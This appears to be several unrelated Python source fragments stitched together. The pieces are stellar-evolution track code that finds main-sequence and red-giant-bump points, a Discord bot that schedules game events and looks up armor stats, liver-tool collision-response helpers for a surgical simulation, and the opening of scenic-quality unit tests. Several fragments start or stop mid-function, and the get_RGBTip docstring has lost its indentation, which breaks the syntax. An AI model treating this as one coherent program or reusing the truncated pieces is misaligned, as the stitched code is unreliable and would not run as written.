		lum_tr = track.loc[i0:ZAMS1, lum]
		Hlum_frac = Hlum_tr/lum_tr
		ZAMS2 = _first_true_index(Hlum_frac >= Hlum_frac_max)
		if ZAMS2 == -1:
			# Fall back to ZAMS1 if the luminosity criterion is never met.
			return ZAMS1
		return ZAMS2
	# or ZAMS_pref = 3: maximum surface gravity before ZAMS1
	logg = eep_params['logg']
	logg_tr = track.loc[0:ZAMS1, logg]
	ZAMS3 = logg_tr.idxmax()
	return ZAMS3
def get_IorT_AMS(track, eep_params, i0, Xmin):
	'''
	Shared implementation for the Intermediate- and Terminal-Age Main
	Sequence (IAMS, TAMS) EEPs: both are defined as the first index at or
	after i0 where the core hydrogen mass fraction drops to Xmin or below.
	Only the Xmin threshold differs between the two.
	'''
	Xc_column = eep_params['core_hydrogen_frac']
	core_h = track.loc[i0:, Xc_column]
	return _first_true_index(core_h <= Xmin)
def get_EAMS(track, eep_params, i0=12, Xmin=0.55):
	'''
	Early-Age Main Sequence: core hydrogen fraction first drops to 0.55.
	Included so low-mass rotevol tracks reach at least one post-ZAMS EEP
	within 15 Gyr.
	'''
	return get_IorT_AMS(track, eep_params, i0, Xmin)
def get_IAMS(track, eep_params, i0=12, Xmin=0.3):
	'''
	Intermediate-Age Main Sequence: core hydrogen fraction first drops to
	0.3. Exists solely to ensure the convective hook is sufficiently
	sampled.
	'''
	return get_IorT_AMS(track, eep_params, i0, Xmin)
def get_TAMS(track, eep_params, i0=14, Xmin=1e-12):
	'''
	Terminal-Age Main Sequence: core hydrogen fraction first drops below
	1e-12, i.e. core hydrogen is effectively exhausted.
	'''
	return get_IorT_AMS(track, eep_params, i0, Xmin)
def get_RGBump(track, eep_params, i0=None):
	'''
	The Red Giant Bump is an interruption in the increase in luminosity on the
	Red Giant Branch. It occurs when the hydrogen-burning shell reaches the
	composition discontinuity left from the first convective dredge-up.
	Dotter skips the Red Giant Bump and proceeds to the Tip of the Red Giant
	Branch, but since the YREC models, at the time of this writing, terminate
	at the helium flash, I choose to use the Red Giant Bump as my final EEP.
	I identify the RGBump as the first local minimum in Teff after the TAMS.
	To avoid weird end-of-track artifacts, if the minimum is within 1 step
	from the end of the raw track, the track is treated as if it doesn't reach
	the RGBump.

	Added 2018/07/22: Some tracks have weird, jumpy behavior before the RGBump
	which gets mistakenly identified as the RGBump. To avoid this, I force the
	RGBump to be the first local minimum in Teff after the TAMS *and* with
	a luminosity above 10 Lsun.

	Returns the track index of the Teff minimum, or -1 if no such minimum is
	found before the end of the track.
	'''
	lum = eep_params['lum']
	log_teff = eep_params['log_teff']
	N = len(track)

	lum_tr = track.loc[i0:, lum]
	logT_tr = track.loc[i0:, log_teff]

	# Start one step past the first row with L > 10 Lsun, so the walk below
	# can always compare against its predecessor.
	RGBump = _first_true_index(lum_tr > 10) + 1
	# _first_true_index returned -1 (no row with L > 10): -1 + 1 == 0.
	if RGBump == 0:
		return -1

	# Walk forward while Teff is still decreasing; stops at the first index
	# whose Teff is >= the previous one, i.e. one past the local minimum.
	while logT_tr[RGBump] < logT_tr[RGBump-1] and RGBump < N-1:
		RGBump += 1

	# Two cases: 1) We didn't reach an extremum, in which case RGBump gets
	# set as the final index of the track. In this case, return -1.
	# 2) We found the extremum, in which case RGBump gets set
	# as the index corresponding to the extremum.
	if RGBump >= N-1:
		return -1
	# RGBump points one past the minimum; the minimum itself is RGBump-1.
	return RGBump-1
def get_RGBTip(track, eep_params, i0=None):
'''
Red Giant Branch Tip
Dotter describes the tip of the red giant branch (RGBTip) EEP as
"the point at which stellar luminosity reaches a maximum---or the stellar
Teff reaches a minimum---after core H burning is complete but before core
He burning has progressed significantly."
Note that the YREC models at the time of this writing nominally end at
the helium flash, so the RGBTip is not recommended | |
quick access to the data without reading the csvs over and over again.
init_unit_data()
#Initializes the event calendar by pulling event data from SEGA's website.
#Sets the scheduler to update the calendar every 24 hours in case there are unannounced changes to the calendar
#Note: They retired scheduled events after New Genesis launched.
init_calendar()
notifier.add_job(init_calendar, 'interval', minutes=1440)
#Print something to the console so we know we passed the initialization stage
print(f'{client.user} has connected to Discord!')
#Set the bot's status message to "Playing PHANTASY STAR ONLINE 2"
await client.change_presence(activity=discord.Game(name="PHANTASY STAR ONLINE 2"))
#Loads all events that haven't started yet into the notification scheduler [the thing that messages event attendees 15 minutes before an event starts]
await loadAllEventNotifs()
#************** loadEvent() ****************
async def loadEvent(event_ID):
	"""Rehydrate a GuildEvent from the database using its event ID."""
	event = GuildEvent(None, None, None, None, None)
	event.DBToEvent(event_ID)
	return event
#************** notify() ****************
async def notify(event_ID):
	"""DM every signup that their event is about to start.

	Loads the event by ID, finds the guild's #event-hosting channel,
	verifies the event message still exists (it may have been
	cancelled/deleted), then messages each signed-up player.
	"""
	event = await loadEvent(event_ID)
	if event is None:
		return
	# BUG FIX: the original assigned event_channel only inside the loop and
	# raised NameError when no 'event-hosting' channel existed. Guard for
	# that case and stop scanning once the channel is found.
	event_channel = None
	for channel in event.guild.text_channels:
		if channel.name == 'event-hosting':
			event_channel = channel
			break
	if event_channel is None:
		return
	message = await event_channel.fetch_message(event_ID)
	if message is None:
		return
	for player in event.playerList:
		user = client.get_user(player)
		await user.send("Hey there {}! This is just a reminder that you signed up for {} at {}. It will begin shortly :) ".format(user.display_name, event.eventName, event.guild))
#************** getEventName() ****************
async def getEventName(ctx):
	"""Prompt the user for an event name with a fun dialogue.

	Returns the discord Message whose .content holds the sanitized name,
	None if the user sent /cancel, or the string "Timeout" if they took
	longer than two minutes to answer.
	"""
	def eventNameCheck(m):
		# Only accept a reply from the same user in the same channel.
		return m.author == ctx.author and m.channel == ctx.channel
	try:
		eventName = await client.wait_for('message', check=eventNameCheck, timeout=120)
		if eventName is not None:
			# Strip mentions and escape markdown so the name renders as plain text.
			eventName.content = eventName.clean_content
			eventName.content = discord.utils.escape_markdown(eventName.content)
	except asyncio.TimeoutError:
		await ctx.author.send("Oh crap, look at the time. I gotta go! Let's talk about this later okay?")
		return "Timeout"
	else:
		if '/host' in eventName.content:
			await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
		if '/cancel' == eventName.content:
			await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
			return None
		if eventName.content is None:
			# BUG FIX: the original sent a literal "{}" to the user because
			# .format(ctx.author.display_name) was missing here.
			await ctx.author.send("I completely zoned out {}, could you repeat that again?".format(ctx.author.display_name))
			eventName = await getEventName(ctx)
		if len(eventName.content) > 1500:
			# Truncate overly long names so downstream embeds don't overflow.
			await ctx.author.send("Eeeeeeeeeeeh? Sorry {}! The event name was too long for me to remember. I got most of it down though!".format(ctx.author.display_name))
			eventName.content = eventName.content[0:1500]
		return eventName
#************** getPartyType() ****************
async def getPartyType(ctx):
	"""Prompt the user for a party size with a fun dialogue.

	Accepts 'four'/'4', 'eight'/'8', 'twelve'/'12' or 'unlimited'
	(case-insensitive) and normalizes .content to the canonical form.
	Returns the Message, None on /cancel, or "Timeout" after two minutes.
	"""
	def fromSameConversation(m):
		return m.author == ctx.author and m.channel == ctx.channel
	try:
		reply = await client.wait_for('message', check=fromSameConversation, timeout=120)
	except asyncio.TimeoutError:
		await ctx.author.send("Oh crap! I'm late for class! Let's talk about this another time, okay? Bye {}!".format(ctx.author.display_name) )
		return "Timeout"
	if '/host' in reply.content:
		await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
	if '/cancel' == reply.content:
		await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
		return None
	# Map every accepted spelling to its canonical size string.
	canonical_sizes = {
		'four': '4', '4': '4',
		'eight': '8', '8': '8',
		'twelve': '12', '12': '12',
		'unlimited': 'unlimited',
	}
	normalized = canonical_sizes.get(reply.content.lower())
	if normalized is None:
		await ctx.author.send("No can do {}, parties can only be 'four' or '4' and multi-parties can only be 'eight', '8', 'twelve', '12' or 'unlimited'. Try again.".format(ctx.author.display_name))
		return await getPartyType(ctx)
	reply.content = normalized
	return reply
#************** getEventDate() ****************
async def getEventDate(ctx):
	"""Prompt the user for the event date/time with a fun dialogue.

	Uses dateparser to infer the date/time without a strict format.
	Returns a datetime on success, None on /cancel, or "Timeout" after
	two minutes; re-prompts recursively if the text can't be parsed.
	"""
	def fromSameConversation(m):
		return m.author == ctx.author and m.channel == ctx.channel
	try:
		reply = await client.wait_for('message', check=fromSameConversation, timeout=120)
	except asyncio.TimeoutError:
		await ctx.author.send("Oh snap! My ride's here! See you later {}!".format(ctx.author.display_name))
		return "Timeout"
	if '/host' in reply.content:
		await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
	if '/cancel' == reply.content:
		await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
		return None
	parsed = dateparser.parse(str(reply.content))
	if parsed is None:
		await ctx.author.send("My bad {} 🙁. I couldn't understand the date and time. Can you try again for me? I'll try to do better 😫".format(ctx.author.display_name))
		parsed = await getEventDate(ctx)
	return parsed
#************** getMutualGuilds() ****************
async def getMutualGuilds(ctx):
	"""Return the list of guilds shared between the bot and ctx.author.

	Returns an empty list when none are shared (callers treat that as
	"can't host") and None only if the lookup itself blows up, matching
	the original contract.

	CLEANUP: the original had an unreachable `else: return None` after the
	try/except (the try always returns) and a broad silent except; the
	broad except is kept deliberately as a best-effort boundary.
	"""
	try:
		return [guild for guild in client.guilds
				if guild.get_member(ctx.author.id)]
	except Exception:
		# Best-effort: a malformed ctx/client just means "no shared guilds".
		return None
#************** getGuildSelection() ****************
#Prompts user for the discord server they'd like to host an event on.
#Only asks when the bot shares more than one server with the user;
#defaults to the single shared server otherwise. Returns a Guild,
#None on /cancel or no shared servers, or "Timeout" after two minutes.
async def getGuildSelection(ctx):
	def guildCheck(m):
		# Only accept a reply from the same user in the same channel.
		return m.author == ctx.author and m.channel == ctx.channel
	mutualGuilds = await getMutualGuilds(ctx)
	# NOTE(review): getMutualGuilds may return None on failure, which would
	# make len() raise here — confirm intended behavior.
	if len(mutualGuilds) < 1:
		await ctx.author.send("You don't share any servers with me {}, it's such a shame :(".format(ctx.author.display_name))
		return None
	elif len(mutualGuilds) == 1:
		# Only one shared server: no need to ask.
		guild = mutualGuilds[0]
		return guild
	else:
		try:
			# Build the prompt listing every shared server by name.
			string = "Mmmn {}, can you tell me which alliance we're hosting this event for?".format(ctx.author.display_name)
			for i in mutualGuilds:
				string = string + "\n> *> {}*".format(i.name)
			await ctx.author.send(string)
			guild = await client.wait_for('message', check=guildCheck, timeout=120)
		except asyncio.TimeoutError:
			await ctx.author.send("What?! The alliance quarters is on fire?! Duty calls {}, we'll discuss this later!".format(ctx.author.display_name))
			return "Timeout"
		else:
			if '/host' in guild.content:
				await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
			if '/cancel' == guild.content:
				await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
				return None
			# Fuzzy-match the user's reply against guild names and pick the
			# closest one, so typos still resolve to the intended server.
			similarity_ratios = {}
			for i in mutualGuilds:
				similarity_ratio = SequenceMatcher(None, guild.content, i.name).ratio()
				similarity_ratios[i] = similarity_ratio
			most_similar = max(similarity_ratios, key=similarity_ratios.get)
			guild = most_similar
			if guild is None:
				# Defensive retry; max() over a non-empty dict shouldn't yield None.
				await ctx.author.send("Sorry {}, I zoned out for a minute. HOSHII TIME TRAVEL MAGIC GO! **poof**".format(ctx.author.display_name))
				guild = await getGuildSelection(ctx)
			return guild
#************** updateuq() ****************
#This was a secret command to force a calendar update without rebooting hoshii
@client.command(hidden=True)
async def updateuq(ctx, *args):
    # Hidden maintenance command: rebuild the urgent-quest calendar without
    # restarting the bot, then confirm to the invoking user by DM.
    init_calendar()
    if ctx:
        await ctx.author.send("Okay {}, I've updated the calendar for you!".format(ctx.author.display_name))
#************** back() ****************
#Returns a list of all back armor data currently stored on hoshii's dictionary. If an arg is sent, will scan for the closest match based on similarity ratio and give detailed stats on that armor piece.
@client.command(description='If there\'s no input, this command will return a list of all of the back units currently in Hoshii\'s dictionary. When given input, it will output the back unit\'s stats.\n\nUsage example: /back cleasis')
async def back(ctx, *args):
    """List all known back units, or show stats of the closest-named one."""
    if len(args) < 1:
        # No search term: dump every dictionary key, one per line.
        listing = ''.join(name + '\n' for name in back_dict.keys())
        await ctx.send(listing)
        return
    # Re-join the words (with a trailing space, matching the historical
    # key format) and fuzzy-match against the dictionary keys.
    query = ' '.join(str(word) for word in args) + ' '
    scores = {name: SequenceMatcher(None, query, name).ratio() for name in back_dict.keys()}
    final_key = max(scores, key=scores.get)
    entry = back_dict[final_key]
    response = "**{}**```\nMEL PWR: {}\nRNG PWR: {}\nTEC PWR: {}\nHP: {}\nPP: {}\n\nMEL DEF: {}\nRNG DEF: {}\nTEC DEF: {}\n\nMEL RES: {}\nRNG RES: {}\nTEC RES: {}\nLight RES: {}\nDark RES: {}\nFire RES: {}\nIce RES: {}\nLightning RES: {}\nWind RES: {}\n\nDEX: {}\n```".format(entry['Unit'], entry['MEL pwr'], entry['RNG pwr'], entry['TEC pwr'], entry['HP'], entry['PP'], entry['M DEF'], entry['R DEF'], entry['T DEF'], entry['M RES'], entry['R RES'], entry['T RES'], entry['Light RES'], entry['Dark RES'], entry['Fire RES'], entry['Ice RES'], entry['Lightning RES'], entry['Wind RES'], entry['DEX'])
    await ctx.send(response)
#************** arms() ****************
#Returns a list of all arm armor data currently stored on hoshii's dictionary. If an arg is sent, | |
<reponame>Kexin-Wei/spinnup
import os
import json
import numpy as np
import itertools
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from mpl_toolkits import mplot3d
def liver_dump_init(env, name=None):
    """Create a fresh recording dict for the liver state of *env*.

    The record holds per-step history lists plus the initial vertex
    positions ('vtx') and a file-name tag ('name').  When *name* is not
    given, a tag is derived from the timestep and damping gamma.
    """
    record = {
        'x': [], 'Fes': [], 'Fis': [], 'Ficp': [],
        'volume': [], 'col_p_n': [], 'crash': [],
    }
    record['vtx'] = env.liver.x.copy()
    record['name'] = name if name is not None else f"_dt{env.timestep}_down_gm{env.liver.gamma}"
    return record
def liver_dump_step(liver, env):
    """Append the current liver state of *env* to the *liver* record.

    Records positions, the three force fields, the relative volume
    (current / initial, rounded to 3 decimals), the number of colliding
    surgical-tool points, and the crash flag.  Returns the mutated record.
    """
    lv = env.liver
    liver['x'].append(lv.x)
    liver['Fes'].append(lv.Fes)
    liver['Fis'].append(lv.Fis)
    liver['Ficp'].append(lv.Ficp)
    relative_volume = np.round(lv.volumes6.sum() / lv.init_volume6.sum(), 3)
    liver['volume'].append(relative_volume)
    liver['col_p_n'].append(len(lv.check_tet_aabb_collision(env.sg.x)))
    liver['crash'].append(lv.crash_flag)
    return liver
def liver_dump(liver, ep=None):
    """Serialise a liver record to JSON under the ``liver_json`` directory.

    The file is named ``liver_record<name>.json`` or, when an episode
    number *ep* is given, ``liver_record_<ep>.json``.  All numpy content
    is converted to plain lists first so it is JSON-serialisable.
    """
    serialisable = {'vtx': liver['vtx'].tolist()}
    for field in ('x', 'Fes', 'Fis', 'Ficp', 'volume', 'col_p_n', 'crash'):
        serialisable[field] = np.array(liver[field]).tolist()
    if ep is None:
        file_name = f"liver_record{liver['name']}.json"
    else:
        file_name = f"liver_record_{int(ep)}.json"
    with open(os.path.join('liver_json', file_name), 'w') as f:
        json.dump(serialisable, f)
def liver_dump_load(liver):
    """Unpack a (JSON-loaded) liver record into numpy arrays.

    Returns the tuple (vtx, x, Fes, Fis, Ficp, volume, col_p_n, crash),
    mirroring the field order used by liver_dump().
    """
    fields = ('vtx', 'x', 'Fes', 'Fis', 'Ficp', 'volume', 'col_p_n', 'crash')
    return tuple(np.array(liver[field]) for field in fields)
'''
Temporary collision-response helpers (candidates for a proper module):
1. collision_response_cotin
2. collision_response_self
'''
def collision_response_cotin(pair,liver,past_p,current_p):
    """Project collided tool points back onto the liver surface along their
    motion rays and return per-vertex surface displacements (Cotin-style).

    Args:
        pair: dict mapping tetrahedron index -> list of colliding point
            indices (as produced by the collision check).
        liver: deformable model; reads liver.x, liver.tri_elements,
            liver.tri_normal_vec, liver.n_tri.
        past_p: point positions at the previous step.   # assumes (n_points, 3) -- TODO confirm
        current_p: point positions at the current step. # assumes (n_points, 3) -- TODO confirm

    Returns:
        dict mapping surface-vertex index -> 3-vector displacement that
        moves the intersected surface triangle out to the colliding point.
    """
    # check bc_co for all surface tri_element
    # add dn to decide
    move_v_disp_dict = {}
    move_tri_indexs = []
    # Flatten {tet: [point indices]} into one flat index array.
    flat_list = [item for sublist in list(pair.values()) for item in sublist]
    p_indexs = np.array(flat_list).reshape(-1)
    p_n = p_indexs.shape[0]
    # Unit direction of each point's motion over the step.
    ray = current_p[p_indexs]-past_p[p_indexs]
    ray = ray*(1/np.linalg.norm(ray,axis=-1))[:,None] # p_n x3
    # compute ray and normal vector, d= ray,n=normal_vec
    dn = ray@liver.tri_normal_vec.T # p_n x n_tri
    ap = liver.x[liver.tri_elements[:,0]][None,:] - past_p[p_indexs][:,None] # p_n x n_tri x 3 #choose first point as a
    apn = (ap * liver.tri_normal_vec[None,:]).sum(axis=-1) # p_n x n_tri x 3 -> p_n x n_tri
    # Ray parameter of each ray/triangle-plane intersection.
    ts = apn * (1/dn) # p_n x n_tri
    int_p = ts[:,:,None]*ray[:,None]+past_p[p_indexs][:,None] # p_n x n_tri x3 <- p_n x n_tri x1 * p_n x1 x3 + p_n x1 x3
    # compute barycentric coordinates of intersection points
    v1 = liver.x[liver.tri_elements[:,1]]-liver.x[liver.tri_elements[:,0]] # n_tri x3
    v2 = liver.x[liver.tri_elements[:,2]]-liver.x[liver.tri_elements[:,0]]
    tri_areax2 = np.linalg.norm(np.cross(v1,v2,axis=-1),axis=-1) # n_tri
    bc_temp = np.zeros((p_n,liver.n_tri,3,3,3))
    bc_temp[:] = np.tile(liver.x[liver.tri_elements], 3).reshape(-1, 3, 3, 3).transpose(0, 2, 1, 3) # p_n x n_tri x 3area x 3ps x 3
    for itemp in range(p_n):
        # Substitute the intersection point for one corner of each of the
        # three sub-triangles used in the barycentric area ratios.
        bc_temp[itemp, :, [0, 1, 2], [0, 1, 2]] = int_p[itemp]
    v1 = bc_temp[:, :, :, 1] - bc_temp[:, :, :, 0] # p_n x n_tri x 3area x 3xyz
    v2 = bc_temp[:, :, :, 2] - bc_temp[:, :, :, 0]
    areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # p_n x n_tri x 3area
    bc_co = areax2 * (1.0 / tri_areax2)[np.newaxis, :,
        np.newaxis] # p_n x n_tri x 3area<- p_n x n_tri x 3area * 1 x n_tri x 3area
    for itemp in range(p_n):
        # check bc_co: barycentric coords must sum to ~1 (point inside the
        # triangle) and the ray must approach the triangle front face (dn < 0).
        check1 = np.argwhere(abs(bc_co[itemp].sum(axis=-1) - 1) < 1e-3).flatten() # each p should have at least 1
        check2 = np.argwhere(dn[itemp] < 0).flatten()
        psb_tri_index = np.intersect1d(check1,check2) # all possible tri_elements satisfies the bc_co and the negative normal vector
        if psb_tri_index.size!=0:
            psb_ts = ts[itemp,psb_tri_index] # n_psb_tri_index
            # if np.any(psb_ts<0):
            #     raise ValueError("liver shape error")
            move_tri_index = psb_tri_index[psb_ts.argmin()] # only 1 the tri_elements should move
            move_t = current_p[p_indexs[itemp]] - int_p[itemp,move_tri_index]
            move_v_index_p = liver.tri_elements[move_tri_index]
            for ividx in move_v_index_p: # same points may move multiple times.
                if ividx not in move_v_disp_dict.keys():
                    move_v_disp_dict[ividx] = move_t # move_t put in for new vindex
                else:# compare move_t for old vindex
                    # Keep the larger displacement for vertices shared by
                    # several moved triangles.
                    if np.linalg.norm(np.c_[move_v_disp_dict[ividx],move_t].T,axis=-1).argmax() == 1 : # older move closer than new
                        move_v_disp_dict[ividx] = move_t
            move_tri_indexs.append(move_tri_index.tolist())
    # NOTE(review): debug print left in -- consider routing through a logger.
    print(move_tri_indexs)
    return move_v_disp_dict
def collision_response_self(pair, liver, tool):
    """Push liver surface triangles outward along the averaged tool-vertex
    normal to resolve tool/liver interpenetration.

    Args:
        pair: dict mapping tetrahedron index -> list of colliding tool
            vertex indices.
        liver: deformable model; reads liver.x, liver.tri_tet,
            liver.tri_elements, liver.tri_normal_vec.
        tool: rigid tool mesh; reads tool.x, tool.vertices,
            tool.vtx_normal_vec.
            # NOTE(review): both tool.x and tool.vertices are used for the
            # tool points -- confirm they refer to the same buffer.

    Returns:
        (new_vtx_delta, move_tris, nv_aves, new_vtx_deltas): the last
        per-tet displacement field, plus per-tet bookkeeping dicts.
        # NOTE(review): new_vtx_delta is the delta of the LAST processed
        # tet only -- confirm callers use new_vtx_deltas for the rest.
    """
    # not so good when the deform is bigger
    # change to old fixed to test, problem still, try cotin methods
    new_vtx_delta = None
    move_tris = {}
    nv_aves = {}
    new_vtx_deltas = {}
    for key, value in pair.items():
        new_vtx_delta = np.zeros(liver.x.shape)
        i_tet, p_index = int(key), np.array(value)
        p_n = p_index.shape[0]
        # find potential collision surface tri_element
        col_tri_index = np.argwhere(liver.tri_tet[:, 0] == i_tet).flatten()
        if col_tri_index.size == 0: raise ValueError(
            "Update time step too big, vertices skip the surface tetrahedron elements")
        col_tri_n = col_tri_index.shape[0]
        col_tri_nv = liver.tri_normal_vec[col_tri_index]
        col_tri_p = liver.x[liver.tri_elements[col_tri_index].T[0]] # chose the first points
        # compute nv_ave: mean unit normal over the colliding tool vertices.
        nv_ave = tool.vtx_normal_vec[p_index].sum(axis=0)
        nv_ave = nv_ave / np.linalg.norm(nv_ave)
        nv_aves[key] = nv_ave
        # compute ts and intersection points
        dn = nv_ave.dot(col_tri_nv.T) # col_tri_n
        ap = col_tri_p[np.newaxis, :] - tool.x[p_index, np.newaxis] # p_n x col_tri_n x 3
        dotn = np.tile(col_tri_nv, p_n).reshape(-1, p_n, 3).transpose(1, 0, 2)
        apn = (ap * dotn).sum(axis=-1) # p_n x col_tri_n
        ts = apn * (1 / dn) # p_n x col_tri_n
        int_col_p = ts[:, :, np.newaxis] * nv_ave[np.newaxis, np.newaxis, :] \
            + tool.vertices[p_index][:, np.newaxis, :] # p_n x col_tri_n x 1 * 1 x 1 x 3 + p_n x 1 x 3
        # compute barycentric coordinates of intersection points
        tri_vertices = liver.x[liver.tri_elements[col_tri_index]] # n_tri x 3 x 3
        v1 = tri_vertices[:, 1] - tri_vertices[:, 0]
        v2 = tri_vertices[:, 2] - tri_vertices[:, 0]
        tri_areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # n_tri
        bc_temp = np.zeros((p_n, col_tri_n, 3, 3, 3))
        bc_temp[:] = np.tile(tri_vertices, 3).reshape(-1, 3, 3, 3).transpose(0, 2, 1, 3) # p_n x col_tri_n x 3 x 3 x 3
        for itemp in range(p_n):
            # Substitute the intersection point into each sub-triangle corner.
            bc_temp[itemp, :, [0, 1, 2], [0, 1, 2]] = int_col_p[itemp]
        v1 = bc_temp[:, :, :, 1] - bc_temp[:, :, :, 0] # p_n x col_tri_n x 3area x 3xyz
        v2 = bc_temp[:, :, :, 2] - bc_temp[:, :, :, 0]
        areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # p_n x col_tri_n x 3area
        bc_co = areax2 * (1.0 / tri_areax2)[np.newaxis, :,
            np.newaxis] # p_n x col_tri_n x 3area * 1 x col_tri_n x 3area = p_n x col_tri_n x 3area
        # Move tri to point with tmax
        check1 = np.argwhere(abs(bc_co.sum(axis=-1) - 1) < 1e-3)
        check2 = np.argwhere(dn < 0)
        inter_tri_index = np.intersect1d(check1[:, 1], check2) # find colliable surface tri_elements index
        # no colliable tri_elements
        if inter_tri_index.size == 0:
            the_best_tri = dn.argmin() # chose one of most collidable tri
            move_tri = liver.tri_elements[col_tri_index[the_best_tri]]
            tri_nv = liver.tri_normal_vec[col_tri_index[the_best_tri]].flatten()
            tri_vtx = liver.x[move_tri].reshape(3, 3)
            v = nv_ave - tri_nv # find a new direction, not so sharp as nv_ave
            v = v / np.linalg.norm(v)
            dn_t = v.dot(tri_nv) # 1
            ap_t = tri_vtx[0] - tool.x[p_index]
            t_t = ap_t.dot(tri_nv) / dn_t
            move_t = t_t.min()
            new_vtx_delta[move_tri] += - move_t * v
            new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
            move_tris.setdefault(key, []).append(move_tri.flatten())
            print(' None ',end='')
        else:
            # more than 1 colliable tri_elements
            if len(inter_tri_index) > 1:
                temp_delta = np.zeros((liver.x.shape[0], len(inter_tri_index))) # n_v * n_inter
                itemp = 0
                for inter_tri_i in inter_tri_index:
                    part_p_index = check1[ check1[:, 1] == inter_tri_i, 0] # p index of each tri_element that satisfies bc_co condition
                    move_t = ts[part_p_index, inter_tri_i].min()
                    move_tri = liver.tri_elements[col_tri_index[inter_tri_i]]
                    temp_delta[move_tri, itemp] = - move_t # collect all possible move_t for all vertices
                    move_tris.setdefault(key, []).append(move_tri.flatten())
                    itemp += 1
                new_vtx_delta += temp_delta.max(axis=-1)[:, np.newaxis] * nv_ave[np.newaxis,:] # move with the maximal move_t
                new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
                print(' Multi ',end='')
            else:
                # only 1 colliable tri_elements
                move_t = ts[:, inter_tri_index].min()
                move_tri = liver.tri_elements[col_tri_index[inter_tri_index]]
                new_vtx_delta[move_tri] += -move_t * nv_ave
                new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
                move_tris.setdefault(key, []).append(move_tri.flatten())
                print(' Single ',end='')
    return new_vtx_delta, move_tris, nv_aves, new_vtx_deltas
'''
static methods:
1. lame_param
2. tri_mid_vec
3. rotation_matrix
4. flatten_list
'''
def lame_param(E, v):
    """Convert Young's modulus *E* and Poisson's ratio *v* into the Lame
    parameters, returned as (lambda, mu)."""
    first_lame = E * v / (1 + v) / (1 - 2 * v)
    shear_modulus = E / 2 / (1 + v)
    return first_lame, shear_modulus
def tri_mid_vec(vertices, tri_elements):
    """Return (centroids, unit normals) for the given triangles.

    Args:
        vertices: (n_vtx, 3) vertex positions.
        tri_elements: (n_tri, 3) vertex indices per triangle.
    """
    corners = vertices[tri_elements]                 # (n_tri, 3, 3)
    centroids = corners.mean(axis=1)
    normals = np.cross(corners[:, 1] - corners[:, 0],
                       corners[:, 2] - corners[:, 0])
    lengths = np.linalg.norm(normals, axis=1)
    normals = normals * (1.0 / lengths)[:, np.newaxis]
    return centroids, normals
def rotation_matrix(deg, axis='x'):
    """Return the 3x3 rotation matrix for *deg* degrees about a principal axis.

    Args:
        deg: rotation angle in degrees.
        axis: one of 'x', 'y', 'z'.

    Raises:
        ValueError: for any other axis.  (Previously an all-ones matrix
        was returned silently, which is not a rotation and would corrupt
        downstream geometry.)
    """
    rad = np.deg2rad(deg)
    s, c = np.sin(rad), np.cos(rad)
    if axis == 'x':
        return np.array([1, 0, 0,
                         0, c, -s,
                         0, s, c]).reshape(-1, 3)
    elif axis == 'y':
        return np.array([c, 0, s,
                         0, 1, 0,
                         -s, 0, c]).reshape(-1, 3)
    elif axis == 'z':
        return np.array([c, -s, 0,
                         s, c, 0,
                         0, 0, 1]).reshape(-1, 3)
    raise ValueError("axis must be 'x', 'y' or 'z', got %r" % (axis,))
# def flatten_list(l):
# # not work well
# for el in l:
# if isinstance(el, Iterable) and not isinstance(el, (str, bytes)):
# return flatten_list(el)
# else:
# return el
'''
matplotlibe subplot
1. create_axs
2. draw_liver
3. draw_liver_tool
'''
def create_axs(subplot_n, block=False, return_fig=False):
    """Create *subplot_n* 3D axes laid out on a near-square grid.

    Args:
        subplot_n: number of subplots to create.
        block: unused here; kept for call-site compatibility.
        return_fig: when True, also return the figure.

    Returns:
        dict {index: Axes3D}, or (dict, figure) when *return_fig* is True.
    """
    n_rows = int(np.floor(np.sqrt(subplot_n)))
    n_cols = int(subplot_n / n_rows)
    fig = plt.figure(figsize=plt.figaspect(0.5))
    axs = {idx: fig.add_subplot(n_rows, n_cols, idx + 1, projection='3d')
           for idx in range(subplot_n)}
    return (axs, fig) if return_fig else axs
def draw_liver(liver, ax):
    """Clear *ax*, redraw the liver's reference ('vtx') and current ('x')
    vertex sets on it, and equalise the axis scales via plt_equal."""
    ax.cla()
    ax = liver.plt_vtx(ax=ax)
    ax = liver.plt_x(ax=ax)
    plt_equal(ax)
    return ax
def draw_liver_F(liver,axs,f_scl = 5e0):
# Fes, Ficp, Fis+ displacement
| |
from __future__ import print_function
import unittest
import logging
import os
import sys
import subprocess
import math
import numpy as np
import random
import time
import csv
import glob
import shutil
import json
from osgeo import gdal
from osgeo import ogr
from nose.plugins.skip import SkipTest
import invest_test_core
from invest_natcap import raster_utils
from invest_natcap.scenic_quality \
import scenic_quality as sq
from invest_natcap.scenic_quality \
import scenic_quality_core as sqc
import scenic_quality_cython_core
# Module-level logger; basicConfig is applied at import time so test output
# carries timestamps (the backslash continues the format string literal).
LOGGER = logging.getLogger('scenic_quality_test')
logging.basicConfig(format='%(asctime)s %(name)-15s %(levelname)-8s \
%(message)s', level=logging.DEBUG, datefmt='%m/%d/%Y %H:%M:%S ')
class TestScenicQuality(unittest.TestCase):
"""Main testing class for the scenic quality tests"""
    def setUp(self):
        # No shared fixtures: each test builds its own arrays.
        pass
    def test_extreme_cell_angles_naive(self):
        """Testing extreme_cell_angles_naive on 3x3 array.
        Sanity check to make sure the naive function does what we expect.
        Inputs: None
        Returns nothing"""
        array_shape = (3, 3)
        # NOTE: integer division (this file targets Python 2) -- the
        # viewpoint is the center cell (1, 1) of the 3x3 grid.
